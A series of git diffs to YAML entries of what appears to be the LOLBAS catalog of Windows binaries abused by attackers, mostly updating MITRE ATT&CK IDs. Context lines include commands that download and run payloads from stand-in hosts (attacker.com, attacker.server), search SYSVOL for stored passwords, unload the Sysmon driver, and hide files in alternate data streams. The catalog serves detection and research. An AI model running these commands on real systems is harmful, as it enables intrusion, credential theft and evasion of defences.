-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\Expand.exe

--- a/yml/OSBinaries/Explorer.yml
+++ b/yml/OSBinaries/Explorer.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: explorer.exe C:\Windows\System32\notepad.exe
     Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10 (Tested)
 Full_Path:
   - Path: C:\Windows\explorer.exe

--- a/yml/OSBinaries/Explorer.yml
+++ b/yml/OSBinaries/Explorer.yml
@@ -9,14 +9,14 @@ Commands:
     Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1202
     OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: explorer.exe C:\Windows\System32\notepad.exe
     Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
     Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1202
     OperatingSystem: Windows 10 (Tested)
 Full_Path:
   - Path: C:\Windows\explorer.exe

--- a/yml/OSBinaries/Extexport.yml
+++ b/yml/OSBinaries/Extexport.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Program Files\Internet Explorer\Extexport.exe

--- a/yml/OSBinaries/Extrac32.yml
+++ b/yml/OSBinaries/Extrac32.yml
@@ -9,16 +9,14 @@ Commands:
     Usecase: Extract data from cab file and hide it in an alternate data stream.
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
     Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
     Usecase: Extract data from cab file and hide it in an alternate data stream.
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
     Description: Copy the source file to the destination file and overwrite it.
@@ -26,7 +24,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe
     Description: Command for copying calc.exe to another folder
@@ -34,7 +31,6 @@ Commands:
     Category: Copy
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\extrac32.exe

--- a/yml/OSBinaries/Findstr.yml
+++ b/yml/OSBinaries/Findstr.yml
@@ -9,24 +9,21 @@ Commands:
     Usecase: Add a file to an alternate data stream to hide from defensive counter measures
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
     Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
     Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: findstr /S /I cpassword \\sysvol\policies\*.xml
     Description: Search for stored password in Group Policy files stored on SYSVOL.
     Usecase: Find credentials stored in cpassword attrbute
     Category: Credentials
     Privileges: User
-    MitreID: T1081
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1081
+    MitreID: T1552.001
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
     Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file.
@@ -34,7 +31,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1185
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1185
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\findstr.exe

--- a/yml/OSBinaries/Finger.yml
+++ b/yml/OSBinaries/Finger.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/techniques/T1105
     OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
 Full_Path:
   - Path: c:\windows\system32\finger.exe

--- a/yml/OSBinaries/FltMC.yml
+++ b/yml/OSBinaries/FltMC.yml
@@ -7,14 +7,13 @@ Commands:
   - Command: fltMC.exe unload SysmonDrv
     Description: Unloads a driver used by security agents
     Usecase: Defense evasion
-    Category: ADS 
+    Category: ADS
     Privileges: Admin
     MitreID: T1562
-    MitreLink: https://attack.mitre.org/techniques/T1562/002/
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\fltMC.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: 4688 events with fltMC.exe

--- a/yml/OSBinaries/FltMC.yml
+++ b/yml/OSBinaries/FltMC.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Defense evasion
     Category: ADS
     Privileges: Admin
-    MitreID: T1562
+    MitreID: T1562.001
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\fltMC.exe

--- a/yml/OSBinaries/Forfiles.yml
+++ b/yml/OSBinaries/Forfiles.yml
@@ -10,15 +10,13 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
     Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
     Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\forfiles.exe

--- a/yml/OSBinaries/Forfiles.yml
+++ b/yml/OSBinaries/Forfiles.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Use forfiles to start a new process to evade defensive counter measures
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1202
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
     Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.

--- a/yml/OSBinaries/Ftp.yml
+++ b/yml/OSBinaries/Ftp.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
     Description: Download
@@ -18,7 +17,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\ftp.exe

--- a/yml/OSBinaries/Ftp.yml
+++ b/yml/OSBinaries/Ftp.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1202
     OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
     Description: Download

--- a/yml/OSBinaries/GfxDownloadWrapper.yml
+++ b/yml/OSBinaries/GfxDownloadWrapper.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/techniques/T1105/
     OperatingSystem: Windows 10
 Full_Path:
   - Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\

--- a/yml/OSBinaries/Gpscript.yml
+++ b/yml/OSBinaries/Gpscript.yml
@@ -9,14 +9,14 @@ Commands:
     Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
     Category: Execute
     Privileges: Administrator
-    MitreID: T1216
+    MitreID: T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: Gpscript /startup
     Description: Executes startup scripts configured in Group Policy
     Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
     Category: Execute
     Privileges: Administrator
-    MitreID: T1216
+    MitreID: T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\gpscript.exe

--- a/yml/OSBinaries/Gpscript.yml
+++ b/yml/OSBinaries/Gpscript.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: Administrator
     MitreID: T1216
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: Gpscript /startup
     Description: Executes startup scripts configured in Group Policy
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: Administrator
     MitreID: T1216
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\gpscript.exe

--- a/yml/OSBinaries/Hh.yml
+++ b/yml/OSBinaries/Hh.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: HH.exe c:\windows\system32\calc.exe
     Description: Executes calc.exe with HTML Help.
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1216
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\hh.exe

--- a/yml/OSBinaries/Hh.yml
+++ b/yml/OSBinaries/Hh.yml
@@ -16,7 +16,7 @@ Commands:
     Usecase: Execute process with HH.exe
     Category: Execute
     Privileges: User
-    MitreID: T1216
+    MitreID: T1202
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\hh.exe

--- a/yml/OSBinaries/IMEWDBLD.yml
+++ b/yml/OSBinaries/IMEWDBLD.yml
@@ -5,12 +5,11 @@ Author: 'Wade Hickey'
 Created: '2020-03-05'
 Commands:
   - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
-    Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> 
+    Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
     Usecase: Download file from Internet
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe

--- a/yml/OSBinaries/Ie4uinit.yml
+++ b/yml/OSBinaries/Ie4uinit.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: c:\windows\system32\ie4uinit.exe

--- a/yml/OSBinaries/Ieexec.yml
+++ b/yml/OSBinaries/Ieexec.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
     Description: Downloads and executes bypass.exe from the remote server.
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe

--- a/yml/OSBinaries/Ilasm.yml
+++ b/yml/OSBinaries/Ilasm.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Compile
     Privileges: User
     MitreID: T1127
-    MitreLink: https://attack.mitre.org/techniques/T1127/
     OperatingSystem: Windows 10,7
   - Command: ilasm.exe C:\public\test.txt /dll
     Description: Binary file used by .NET to compile c# code to dll
@@ -18,7 +17,6 @@ Commands:
     Category: Compile
     Privileges: User
     MitreID: T1127
-    MitreLink: https://attack.mitre.org/techniques/T1127/
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe

--- a/yml/OSBinaries/Infdefaultinstall.yml
+++ b/yml/OSBinaries/Infdefaultinstall.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\Infdefaultinstall.exe

--- a/yml/OSBinaries/Installutil.yml
+++ b/yml/OSBinaries/Installutil.yml
@@ -9,16 +9,14 @@ Commands:
     Usecase: Use to execute code and bypass application whitelisting
     Category: AWL bypass
     Privileges: User
-    MitreID: T1118
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1118
+    MitreID: T1218.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
     Description: Execute the target .NET DLL or EXE.
     Usecase: Use to execute code and bypass application whitelisting
     Category: Execute
     Privileges: User
-    MitreID: T1118
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1118
+    MitreID: T1218.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
@@ -32,7 +30,7 @@ Detection:
 Resources:
   - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
   - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
-  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1118/T1118.md
+  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md
   - Link: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
   - Link: https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool

--- a/yml/OSBinaries/Jsc.yml
+++ b/yml/OSBinaries/Jsc.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Compile
     Privileges: User
     MitreID: T1127
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: jsc.exe /t:library Library.js
     Description: Use jsc.exe to compile javascript code stored in Library.js and output Library.dll.
@@ -18,7 +17,6 @@ Commands:
     Category: Compile
     Privileges: User
     MitreID: T1127
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe

--- a/yml/OSBinaries/Makecab.yml
+++ b/yml/OSBinaries/Makecab.yml
@@ -9,16 +9,14 @@ Commands:
     Usecase: Hide data compressed into an alternate data stream
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
     Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
     Usecase: Hide data compressed into an alternate data stream
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
     Description: Download and compresses the target file and stores it in the target file.
@@ -26,7 +24,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\makecab.exe

--- a/yml/OSBinaries/Mavinject.yml
+++ b/yml/OSBinaries/Mavinject.yml
@@ -9,16 +9,14 @@ Commands:
     Usecase: Inject dll file into running process
     Category: Execute
     Privileges: User
-    MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    MitreID: T1218.013
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
     Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
     Usecase: Inject dll file into running process
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\mavinject.exe

--- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
+++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1127
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows 10S
   - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
     Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1127
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows 10S
   - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
     Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
@@ -26,7 +24,6 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1127
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows 10S
 Full_Path:
   - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe

--- a/yml/OSBinaries/Mmc.yml
+++ b/yml/OSBinaries/Mmc.yml
@@ -9,8 +9,7 @@ Commands:
     Usecase: Configure a snap-in to load a COM custom class (CLSID) that has been added to the registry
     Category: Execute
     Privileges: User
-    MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    MitreID: T1218.014
     OperatingSystem: Windows 10 (and possibly earlier versions)
 Full_Path:
   - Path: C:\Windows\System32\mmc.exe

--- a/yml/OSBinaries/MpCmdRun.yml
+++ b/yml/OSBinaries/MpCmdRun.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows 10
   - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe
     Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
@@ -18,15 +17,13 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows 10
   - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe
     Description: Download file to machine and store it in Alternate Data Stream
     Usecase: Hide downloaded data inton an Alternate Data Stream
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe

--- a/yml/OSBinaries/Msbuild.yml
+++ b/yml/OSBinaries/Msbuild.yml
@@ -9,37 +9,35 @@ Commands:
     Usecase: Compile and run code
     Category: AWL bypass
     Privileges: User
-    MitreID: T1127
+    MitreID: T1127.001
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msbuild.exe project.csproj
     Description: Build and execute a C# project stored in the target csproj file.
     Usecase: Compile and run code
     Category: Execute
     Privileges: User
-    MitreID: T1127
+    MitreID: T1127.001
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msbuild.exe @sample.rsp
-    Description: Executes Logger statements from rsp file 
+    Description: Executes Logger statements from rsp file
     Usecase: Execute DLL
     Category: Execute
     Privileges: User
-    MitreID: T1127
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
+    MitreID: T1127.001
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
     Description: Executes generated Logger dll file with TargetLogger export
     Usecase: Execute DLL
     Category: Execute
     Privileges: User
-    MitreID: T1127
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
+    MitreID: T1127.001
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msbuild.exe project.proj
     Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
     Usecase: Execute project file that contains XslTransformation tag parameters
     Category: Execute
     Privileges: User
-    MitreID: T1127
+    MitreID: T1127.001
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe

--- a/yml/OSBinaries/Msbuild.yml
+++ b/yml/OSBinaries/Msbuild.yml
@@ -10,7 +10,6 @@ Commands:
     Category: AWL bypass
     Privileges: User
     MitreID: T1127
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msbuild.exe project.csproj
     Description: Build and execute a C# project stored in the target csproj file.
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1127
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msbuild.exe @sample.rsp
     Description: Executes Logger statements from rsp file 
@@ -42,8 +40,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1127
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10    
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
@@ -52,7 +49,7 @@ Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
   - Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
-Code_Sample: 
+Code_Sample:
   - Code:
 Detection:
  - IOC: Msbuild.exe should not normally be executed on workstations

--- a/yml/OSBinaries/Msconfig.yml
+++ b/yml/OSBinaries/Msconfig.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: Administrator
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\msconfig.exe

--- a/yml/OSBinaries/Msdt.yml
+++ b/yml/OSBinaries/Msdt.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
     Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
@@ -18,7 +17,6 @@ Commands:
     Category: AWL bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\Msdt.exe

--- a/yml/OSBinaries/Mshta.yml
+++ b/yml/OSBinaries/Mshta.yml
@@ -9,32 +9,28 @@ Commands:
     Usecase: Execute code
     Category: Execute
     Privileges: User
-    MitreID: T1170
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
+    MitreID: T1218.005
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
     Description: Executes VBScript supplied as a command line argument.
     Usecase: Execute code
     Category: Execute
     Privileges: User
-    MitreID: T1170
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
+    MitreID: T1218.005
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
     Description: Executes JavaScript supplied as a command line argument.
     Usecase: Execute code
     Category: Execute
     Privileges: User
-    MitreID: T1170
